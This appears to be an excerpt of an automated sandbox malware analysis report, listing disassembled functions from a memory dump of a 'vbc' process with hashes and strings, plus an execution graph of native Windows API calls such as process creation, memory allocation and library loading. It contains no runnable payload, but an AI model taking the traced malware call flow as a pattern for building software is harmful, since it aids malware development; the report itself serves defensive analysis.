                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: ae58000c6b1cff626de53117193a2f174a5a3ca5eacd66f3091aa43aeca3f8e4
                                                                                                                        • Instruction ID: 02ea3ae8941f2ac0efbd0e7263a744e36fefbe876e00edff43324eb2dbbbfa1c
                                                                                                                        • Opcode Fuzzy Hash: ae58000c6b1cff626de53117193a2f174a5a3ca5eacd66f3091aa43aeca3f8e4
                                                                                                                        • Instruction Fuzzy Hash: F651E9BAE0421ABFCB25DB98889097FF7B9FB092007548169F4A5D7641D378DE50CBA0
                                                                                                                        Function 053E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: e03a2b0b8e57ac4213b4d822a58d3b86f11a63f331d74249b32336f2c4374989
                                                                                                                        • Instruction ID: 287fa56b843405254c8cd0446719d04f452201cc4b5cceb8f7fbf04059352d7c
                                                                                                                        • Opcode Fuzzy Hash: e03a2b0b8e57ac4213b4d822a58d3b86f11a63f331d74249b32336f2c4374989
                                                                                                                        • Instruction Fuzzy Hash: 91510779A04665AECB34DF5CC99097FF7FEFB44200B048859F496C76C1E6B4EA448B60
                                                                                                                        Function 05367630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ExecuteOptions, xrefs: 053A46A0
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 053A4742
                                                                                                                        • Execute=1, xrefs: 053A4713
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 053A4725
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 053A4787
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 053A46FC
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 053A4655
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: b580f0b7f25ed4665c10affc70ed17f7a6102e4646dc6611ca121e9347ab1e80
                                                                                                                        • Instruction ID: de2f679604eb3f75d37e7ebbab1732f79f57cfa5eb2ec363aef8d9023bb1f77a
                                                                                                                        • Opcode Fuzzy Hash: b580f0b7f25ed4665c10affc70ed17f7a6102e4646dc6611ca121e9347ab1e80
                                                                                                                        • Instruction Fuzzy Hash: F0510931B002197AEF25EBA4DC89FFA77A9FF04308F4440ADE505EB190EBB19A41CB55
                                                                                                                        Function 05406940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction ID: cdb88bf40a87ec823477fe1cc190b07c4f6e9ef34205fc1fbea29d233837a827
                                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction Fuzzy Hash: AF022571608341AFD305DF18C494AABB7E5FFC8710F21996EF9864B2A4DB31E905CB92
                                                                                                                        Function 0537B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: 4714a5373c772d92111ddeb9315efb1a5e426d11a6961969945c4d30245a1d86
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: 2781A270E0528D9EDF35CE68C8B17FEFBB6BF45350F184259D8A1A7290E77898408754
                                                                                                                        Function 053E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: a8af51e073c2988e509722a322de77cb15c14080dd705c1b949697e9479084ae
                                                                                                                        • Instruction ID: 1027abc13d61abc99e3b004b26ed8fe052acbc94940dd7a5a61d0d93d6d3ae0a
                                                                                                                        • Opcode Fuzzy Hash: a8af51e073c2988e509722a322de77cb15c14080dd705c1b949697e9479084ae
                                                                                                                        • Instruction Fuzzy Hash: 642153BAE00229ABDB14DE79CC44AFFB7EDEF44640F440116F905E3240EB759A059BA1
                                                                                                                        Function 0535F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 053A02BD
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 053A02E7
                                                                                                                        • RTL: Re-Waiting, xrefs: 053A031E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: 2498ff7709d8ca9b74b0c2f8bba705c2ff48511214b237150bbe00ec250c59de
                                                                                                                        • Instruction ID: 4a5264f60298e939dec0f334129e6db7588987e840d27269b34949141ada9c01
                                                                                                                        • Opcode Fuzzy Hash: 2498ff7709d8ca9b74b0c2f8bba705c2ff48511214b237150bbe00ec250c59de
                                                                                                                        • Instruction Fuzzy Hash: 03E1AF716087419FD729CF28C888F6AB7E5FB84324F140A19F9A68B6D0D7B4E944CB42
                                                                                                                        Function 0536BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 053A7B7F
                                                                                                                        • RTL: Resource at %p, xrefs: 053A7B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 053A7BAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 40b647334625f76e5a2e772e64c75791e73da39b6f9da660a677c25be8b3eab1
                                                                                                                        • Instruction ID: 85e42933df492c855b5c0a4b894a7d908adda60ed51ce2966ce9bd1213bb4f2d
                                                                                                                        • Opcode Fuzzy Hash: 40b647334625f76e5a2e772e64c75791e73da39b6f9da660a677c25be8b3eab1
                                                                                                                        • Instruction Fuzzy Hash: 9041B1367047029FDB24DE29CC50B6AB7E6FB88710F104A2DE956DB690DBB1E4058FA1
                                                                                                                        Function 0536B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053A728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 053A7294
                                                                                                                        • RTL: Resource at %p, xrefs: 053A72A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 053A72C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: c164819fde15765d9497d0443c2f406499d369f9b5b13182cd5f2434db124c3a
                                                                                                                        • Instruction ID: f62f894da47dd31a8a56cd583a50a3765dd5f92746ff852f34c49b6552d2deca
                                                                                                                        • Opcode Fuzzy Hash: c164819fde15765d9497d0443c2f406499d369f9b5b13182cd5f2434db124c3a
                                                                                                                        • Instruction Fuzzy Hash: B2410236704606ABD721DE24CC81F66B7A6FF84710F104629F955EB640EB71E812CBD1
                                                                                                                        Function 053E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: c89c6c745e080bb38a15b40a4d46ac788733dd4cdfee49bce749e3a4b3410c2b
                                                                                                                        • Instruction ID: f0d105dd311837e19f4b01bf2a84ae84a862e5d840773d94edcf137b5fc48502
                                                                                                                        • Opcode Fuzzy Hash: c89c6c745e080bb38a15b40a4d46ac788733dd4cdfee49bce749e3a4b3410c2b
                                                                                                                        • Instruction Fuzzy Hash: 15314176A006299EDB24DE69CC44BEFB7FCFB44610F444556F849E3240EB70AE489FA0
                                                                                                                        Function 05377D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: ca0256d94928df86883db15811a51d93af0ca9ad55df75f256de2b77d6c26b47
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 2B91A170F0420E9BDB34DE69C984ABEB7A6FF44320F14451AE865E76C0D7B89942CB60
                                                                                                                        Function 05339126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: 093539f239edf77616c520d5d32bdb360ca4aae6006da027003d55ff71954d97
                                                                                                                        • Instruction ID: 5fabe65d88b8c647c8da7ea0b76f207f7791fc45df5700ec8d6b3dbca4f6b68b
                                                                                                                        • Opcode Fuzzy Hash: 093539f239edf77616c520d5d32bdb360ca4aae6006da027003d55ff71954d97
                                                                                                                        • Instruction Fuzzy Hash: 7B811BB6D00669DBDB35DF54CC45BEEB7B9AB08710F0041EAA919B7680D7709E84CFA0
                                                                                                                        Function 053BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 053BCFBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                        • String ID: @$@4Cw@4Cw
                                                                                                                        • API String ID: 4062629308-3101775584
                                                                                                                        • Opcode ID: ab4872df4346b3045380b7a111640a808e00d8ad80cd70a9a2a7df4527774c47
                                                                                                                        • Instruction ID: 4616abc65aebaa8092c71b6dfecec37bea176db23342df0d436a37ac9fdc899e
                                                                                                                        • Opcode Fuzzy Hash: ab4872df4346b3045380b7a111640a808e00d8ad80cd70a9a2a7df4527774c47
                                                                                                                        • Instruction Fuzzy Hash: 0641BFB1A00228DFDB21DFA5C884AEEBBB8FF44704F50486AEA15DB650D7B49801DB60

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                        Signature Coverage:2.3%
                                                                                                                        Total number of Nodes:443
                                                                                                                        Total number of Limit Nodes:74
                                                                                                                        execution_graph 100647 2d69e10 100649 2d6a218 100647->100649 100648 2d6a790 100649->100648 100651 2d8b520 100649->100651 100652 2d8b546 100651->100652 100657 2d64060 100652->100657 100654 2d8b552 100655 2d8b58b 100654->100655 100660 2d85900 100654->100660 100655->100648 100664 2d73580 100657->100664 100659 2d6406d 100659->100654 100661 2d85962 100660->100661 100663 2d8596f 100661->100663 100688 2d71d40 100661->100688 100663->100655 100665 2d73597 100664->100665 100667 2d735b0 100665->100667 100668 2d8a250 100665->100668 100667->100659 100670 2d8a26a 100668->100670 100669 2d8a299 100669->100667 100670->100669 100675 2d88e00 100670->100675 100676 2d88e1d 100675->100676 100682 5002c0a 100676->100682 100677 2d88e49 100679 2d8b8b0 100677->100679 100685 2d89b60 100679->100685 100681 2d8a30c 100681->100667 100683 5002c11 100682->100683 100684 5002c1f LdrInitializeThunk 100682->100684 100683->100677 100684->100677 100686 2d89b7d 100685->100686 100687 2d89b8e RtlFreeHeap 100686->100687 100687->100681 100689 2d71d7b 100688->100689 100704 2d781f0 100689->100704 100691 2d71d83 100692 2d72066 100691->100692 100715 2d8b990 100691->100715 100692->100663 100694 2d71d99 100695 2d8b990 RtlAllocateHeap 100694->100695 100696 2d71daa 100695->100696 100697 2d8b990 RtlAllocateHeap 100696->100697 100698 2d71dbb 100697->100698 100703 2d71e52 100698->100703 100727 2d76d80 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100698->100727 100701 2d72012 100723 2d88240 100701->100723 100718 2d748c0 100703->100718 100705 2d7821c 100704->100705 100728 2d780e0 100705->100728 100708 2d78254 100708->100691 100709 2d78249 100709->100708 100734 2d897d0 100709->100734 100710 2d78261 100711 2d7827d 100710->100711 100713 2d897d0 NtClose 100710->100713 100711->100691 100714 2d78273 100713->100714 100714->100691 100742 2d89b10 100715->100742 100717 2d8b9ab 100717->100694 100720 2d748e4 100718->100720 100719 2d748eb 100719->100701 100720->100719 100721 2d74937 100720->100721 100722 2d74920 LdrLoadDll 100720->100722 100721->100701 100722->100721 100724 2d882a1 100723->100724 100725 2d882ae 100724->100725 100745 2d72080 100724->100745 100725->100692 100727->100703 100729 2d780fa 100728->100729 100733 2d781d6 100728->100733 100737 2d88ea0 100729->100737 100732 2d897d0 NtClose 100732->100733 100733->100709 100733->100710 100735 2d897ed 100734->100735 100736 2d897fe NtClose 100735->100736 100736->100708 100738 2d88ebd 100737->100738 100741 50035c0 LdrInitializeThunk 100738->100741 100739 2d781ca 100739->100732 100741->100739 100743 2d89b2d 100742->100743 100744 2d89b3e RtlAllocateHeap 100743->100744 100744->100717 100761 2d784c0 100745->100761 100747 2d720a0 100755 2d725f3 100747->100755 100765 2d81430 100747->100765 100750 2d722b4 100773 2d8ca80 100750->100773 100751 2d720fe 100751->100755 100768 2d8c950 100751->100768 100753 2d72319 100753->100755 100758 2d70bb0 LdrInitializeThunk 100753->100758 100783 2d78460 100753->100783 100755->100725 100756 2d722c9 100756->100753 100779 2d70bb0 100756->100779 100758->100753 100759 2d78460 LdrInitializeThunk 100760 2d72467 100759->100760 100760->100753 100760->100759 100762 2d784cd 100761->100762 100763 2d784f5 100762->100763 100764 2d784ee SetErrorMode 100762->100764 100763->100747 100764->100763 100767 2d81451 100765->100767 100787 2d8b830 100765->100787 100767->100751 100769 2d8c960 100768->100769 100770 2d8c966 100768->100770 100769->100750 100771 2d8b990 RtlAllocateHeap 100770->100771 100772 2d8c98c 100771->100772 100772->100750 100774 2d8c9f0 100773->100774 100775 2d8b990 RtlAllocateHeap 100774->100775 100778 2d8ca4d 100774->100778 100776 2d8ca2a 100775->100776 100777 2d8b8b0 RtlFreeHeap 100776->100777 100777->100778 100778->100756 100780 2d70bc3 100779->100780 100794 2d89a70 100780->100794 100784 2d78473 100783->100784 100799 2d88d00 100784->100799 100786 2d7849e 100786->100753 100790 2d89940 100787->100790 100789 2d8b85e 100789->100767 100791 2d899d8 100790->100791 100793 2d8996e 100790->100793 100792 2d899ee NtAllocateVirtualMemory 100791->100792 100792->100789 100793->100789 100795 2d89a8a 100794->100795 100798 5002c70 LdrInitializeThunk 100795->100798 100796 2d70bcf 100796->100760 100798->100796 100800 2d88d81 100799->100800 100802 2d88d2e 100799->100802 100804 5002dd0 LdrInitializeThunk 100800->100804 100801 2d88da6 100801->100786 100802->100786 100804->100801 100805 2d77490 100806 2d774ac 100805->100806 100814 2d774ff 100805->100814 100808 2d897d0 NtClose 100806->100808 100806->100814 100807 2d77637 100809 2d774c7 100808->100809 100815 2d768b0 NtClose LdrInitializeThunk LdrInitializeThunk 100809->100815 100811 2d77611 100811->100807 100817 2d76a80 NtClose LdrInitializeThunk LdrInitializeThunk 100811->100817 100814->100807 100816 2d768b0 NtClose LdrInitializeThunk LdrInitializeThunk 100814->100816 100815->100814 100816->100811 100817->100807 100818 2d7b090 100823 2d7ada0 100818->100823 100820 2d7b09d 100837 2d7aa20 100820->100837 100822 2d7b0b9 100824 2d7adc5 100823->100824 100848 2d786d0 100824->100848 100827 2d7af13 100827->100820 100829 2d7af2a 100829->100820 100830 2d7af21 100830->100829 100832 2d7b017 100830->100832 100867 2d7a470 100830->100867 100834 2d7b07a 100832->100834 100876 2d7a7e0 100832->100876 100835 2d8b8b0 RtlFreeHeap 100834->100835 100836 2d7b081 100835->100836 100836->100820 100838 2d7aa36 100837->100838 100845 2d7aa41 100837->100845 100839 2d8b990 RtlAllocateHeap 100838->100839 100839->100845 100840 2d7aa62 100840->100822 100841 2d786d0 GetFileAttributesW 100841->100845 100842 2d7ad72 100843 2d7ad8b 100842->100843 100844 2d8b8b0 RtlFreeHeap 100842->100844 100843->100822 100844->100843 100845->100840 100845->100841 100845->100842 100846 2d7a470 RtlFreeHeap 100845->100846 100847 2d7a7e0 RtlFreeHeap 100845->100847 100846->100845 100847->100845 100849 2d786f1 100848->100849 100850 2d78703 100849->100850 100851 2d786f8 GetFileAttributesW 100849->100851 100850->100827 100852 2d83640 100850->100852 100851->100850 100853 2d8364e 100852->100853 100854 2d83655 100852->100854 100853->100830 100855 2d748c0 LdrLoadDll 100854->100855 100856 2d8368a 100855->100856 100857 2d83699 100856->100857 100880 2d83100 LdrLoadDll 100856->100880 100859 2d8b990 RtlAllocateHeap 100857->100859 100863 2d83844 100857->100863 100860 2d836b2 100859->100860 100861 2d8383a 100860->100861 100860->100863 100864 2d836ce 100860->100864 100862 2d8b8b0 RtlFreeHeap 100861->100862 100861->100863 100862->100863 100863->100830 100864->100863 100865 2d8b8b0 RtlFreeHeap 100864->100865 100866 2d8382e 100865->100866 100866->100830 100868 2d7a496 100867->100868 100881 2d7dea0 100868->100881 100870 2d7a508 100872 2d7a690 100870->100872 100874 2d7a526 100870->100874 100871 2d7a675 100871->100830 100872->100871 100873 2d7a330 RtlFreeHeap 100872->100873 100873->100872 100874->100871 100886 2d7a330 100874->100886 100877 2d7a806 100876->100877 100878 2d7dea0 RtlFreeHeap 100877->100878 100879 2d7a88d 100878->100879 100879->100832 100880->100857 100883 2d7dec4 100881->100883 100882 2d7ded1 100882->100870 100883->100882 100884 2d8b8b0 RtlFreeHeap 100883->100884 100885 2d7df14 100884->100885 100885->100870 100887 2d7a34d 100886->100887 100890 2d7df30 100887->100890 100889 2d7a453 100889->100874 100891 2d7df54 100890->100891 100892 2d7dffe 100891->100892 100893 2d8b8b0 RtlFreeHeap 100891->100893 100892->100889 100893->100892 100894 2d72610 100895 2d88e00 LdrInitializeThunk 100894->100895 100896 2d72646 100895->100896 100899 2d89870 100896->100899 100898 2d7265b 100900 2d898ff 100899->100900 100902 2d8989b 100899->100902 100904 5002e80 LdrInitializeThunk 100900->100904 100901 2d89930 100901->100898 100902->100898 100904->100901 100905 2d75f10 100906 2d78460 LdrInitializeThunk 100905->100906 100907 2d75f40 100906->100907 100909 2d75f6c 100907->100909 100910 2d783e0 100907->100910 100911 2d78424 100910->100911 100912 2d78445 100911->100912 100917 2d88ad0 100911->100917 100912->100907 100914 2d78435 100915 2d78451 100914->100915 100916 2d897d0 NtClose 100914->100916 100915->100907 100916->100912 100918 2d88b50 100917->100918 100919 2d88afe 100917->100919 100922 5004650 LdrInitializeThunk 100918->100922 100919->100914 100920 2d88b75 100920->100914 100922->100920 100928 2d85c90 100930 2d85cf4 100928->100930 100929 2d85d2b 100930->100929 100933 2d814a0 100930->100933 100932 2d85d0d 100934 2d814aa 100933->100934 100935 2d81446 100933->100935 100936 2d8b830 NtAllocateVirtualMemory 100935->100936 100937 2d81451 100936->100937 100937->100932 100948 5002ad0 LdrInitializeThunk 100949 2d734c5 100950 2d73474 100949->100950 100952 2d734c8 100949->100952 100951 2d780e0 2 API calls 100950->100951 100953 2d73483 100951->100953 100954 2d897d0 NtClose 100953->100954 100955 2d7349f 100953->100955 100954->100955 100956 2d78b81 100958 2d78b91 100956->100958 100957 2d78b41 100958->100957 100960 2d77410 100958->100960 100961 2d7745f 100960->100961 100962 2d77426 100960->100962 100961->100957 100962->100961 100964 2d77280 LdrLoadDll 100962->100964 100964->100961 100965 2d894c0 100966 2d89577 100965->100966 100968 2d894ef 100965->100968 100967 2d8958d NtCreateFile 100966->100967 100969 2d7118b PostThreadMessageW 100970 2d7119d 100969->100970 100973 2d6b870 100974 2d8b830 NtAllocateVirtualMemory 100973->100974 100975 2d6cee1 100974->100975 100976 2d69db0 100977 2d69dbf 100976->100977 100978 2d69e00 100977->100978 100979 2d69ded CreateThread 100977->100979 100980 2d770f0 100981 2d7711a 100980->100981 100984 2d78290 100981->100984 100983 2d77141 100985 2d782ad 100984->100985 100991 2d88ef0 100985->100991 100987 2d782fd 100988 2d78304 100987->100988 100996 2d88fd0 100987->100996 100988->100983 100990 2d7832d 100990->100983 100992 2d88f8b 100991->100992 100993 2d88f1b 100991->100993 101001 5002f30 LdrInitializeThunk 100992->101001 100993->100987 100994 2d88fc4 100994->100987 100997 2d89081 100996->100997 100998 2d88fff 100996->100998 101002 5002d10 LdrInitializeThunk 100997->101002 100998->100990 100999 2d890c6 100999->100990 101001->100994 101002->100999 101003 2d77670 101004 2d77688 101003->101004 101006 2d776e2 101003->101006 101004->101006 101007 2d7b5b0 101004->101007 101008 2d7b5d6 101007->101008 101009 2d7b809 101008->101009 101034 2d89bf0 101008->101034 101009->101006 101011 2d7b64c 101011->101009 101012 2d8ca80 2 API calls 101011->101012 101013 2d7b66b 101012->101013 101013->101009 101014 2d7b742 101013->101014 101015 2d88e00 LdrInitializeThunk 101013->101015 101016 2d75e90 LdrInitializeThunk 101014->101016 101018 2d7b761 101014->101018 101017 2d7b6cd 101015->101017 101016->101018 101017->101014 101023 2d7b6d6 101017->101023 101020 2d7b7f1 101018->101020 101040 2d88970 101018->101040 101019 2d7b72a 101021 2d78460 LdrInitializeThunk 101019->101021 101027 2d78460 LdrInitializeThunk 101020->101027 101026 2d7b738 101021->101026 101022 2d7b708 101055 2d84a80 LdrInitializeThunk 101022->101055 101023->101009 101023->101019 101023->101022 101037 2d75e90 101023->101037 101026->101006 101030 2d7b7ff 101027->101030 101029 2d7b7c8 101045 2d88a20 101029->101045 101030->101006 101032 2d7b7e2 101050 2d88b80 101032->101050 101035 2d89c0d 101034->101035 101036 2d89c1e CreateProcessInternalW 101035->101036 101036->101011 101038 2d88fd0 LdrInitializeThunk 101037->101038 101039 2d75ece 101038->101039 101039->101022 101041 2d889ed 101040->101041 101043 2d8899b 101040->101043 101056 50039b0 LdrInitializeThunk 101041->101056 101042 2d88a12 101042->101029 101043->101029 101046 2d88a9d 101045->101046 101048 2d88a4b 101045->101048 101057 5004340 LdrInitializeThunk 101046->101057 101047 2d88ac2 101047->101032 101048->101032 101051 2d88bfd 101050->101051 101053 2d88bab 101050->101053 101058 5002fb0 LdrInitializeThunk 101051->101058 101052 2d88c22 101052->101020 101053->101020 101055->101019 101056->101042 101057->101047 101058->101052 101059 2d89630 101060 2d896d7 101059->101060 101062 2d8965b 101059->101062 101061 2d896ed NtReadFile 101060->101061 101063 2d88c30 101064 2d88c5b 101063->101064 101065 2d88cbf 101063->101065 101068 5002ee0 LdrInitializeThunk 101065->101068 101066 2d88cf0 101068->101066 101069 2d81df0 101070 2d81e09 101069->101070 101071 2d81e99 101070->101071 101072 2d81e54 101070->101072 101075 2d81e94 101070->101075 101073 2d8b8b0 RtlFreeHeap 101072->101073 101074 2d81e64 101073->101074 101076 2d8b8b0 RtlFreeHeap 101075->101076 101076->101071 101077 2d8c9b0 101078 2d8b8b0 RtlFreeHeap 101077->101078 101079 2d8c9c5 101078->101079 101080 2d88db0 101081 2d88dcd 101080->101081 101084 5002df0 LdrInitializeThunk 101081->101084 101082 2d88df5 101084->101082 101085 2d86370 101086 2d863ca 101085->101086 101088 2d863d7 101086->101088 101089 2d83d60 101086->101089 101090 2d8b830 